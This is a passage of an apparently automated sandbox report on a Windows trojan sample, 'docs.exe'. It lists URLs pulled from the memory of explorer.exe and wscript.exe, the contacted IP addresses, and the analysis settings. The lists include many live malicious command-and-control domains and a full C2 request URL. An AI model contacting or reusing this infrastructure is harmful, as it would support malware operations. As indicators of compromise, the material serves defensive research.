                                                                                          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.khizmetlergirisyapzzz2024.net/c24t/www.23fd595ig.autosexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.amilablackwell.online/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.delark.clickexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.aithful.eventsReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.2163588037.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://outlook.comeexplorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000000.2158468861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.oko.events/c24t/www.consuyt.xyzexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.ridges-freezers-56090.bond/c24t/explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.khizmetlergirisyapzzz2024.netReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.j88.travel/c24t/www.venir-bienne.infoexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.hecreature.tech/c24t/www.ealerslot.netexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.23fd595ig.autosexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.consuyt.xyz/c24t/www.hecreature.techexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.hecreature.techexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://api.msn.com/Iexplorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.ealerslot.netReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.earing-tests-69481.bond/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.aithful.events/c24t/www.amilablackwell.onlineexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.ridges-freezers-56090.bondexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://schemas.microexplorer.exe, 00000006.00000000.2155015039.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2155041109.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4588766205.00000000028A0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.eviewmadu.topReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.hecreature.techReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.uijiuw.top/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.ealerslot.net/c24t/www.aithful.eventsexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.oko.eventsexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.eviewmadu.top/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.oko.events/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.uijiuw.topexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.amilablackwell.online/c24t/www.eviewmadu.topexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.khizmetlergirisyapzzz2024.net/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.venir-bienne.infoexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.earing-tests-69481.bondReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.23fd595ig.autos/c24t/www.j88.travelexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.j88.travel/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.j88.travelexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.23fd595ig.autosReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.eviewmadu.topexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://excel.office.com-explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://www.472.topReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://www.ealerslot.netexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exefalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://www.delark.click/c24t/www.ridges-freezers-56090.bondexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://www.ealerslot.net/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://powerpoint.office.comEMdexplorer.exe, 00000006.00000002.4606649141.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://www.venir-bienne.infoReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.hecreature.tech/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://api.msn.com/explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://www.consuyt.xyzexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2explorer.exe, 00000006.00000002.4608809096.0000000010C8F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.00000000054DF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://www.delark.click/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                    		unknown

                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    188.114.96.3
                                                                                                                                                                                                                    		www.j88.travelEuropean Union
                                                                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                    185.26.122.70
                                                                                                                                                                                                                    		www.oko.eventsRussian Federation
                                                                                                                                                                                                                    		62082HOSTLANDRUtrue

                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1522819
                                                                                                                                                                                                                    Start date and time:2024-09-30 18:15:09 +02:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 11m 36s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:17
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:docs.exe
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal100.troj.evad.winEXE@12/6@11/2
                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    • Number of executed functions: 119
                                                                                                                                                                                                                    • Number of non-executed functions: 358
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
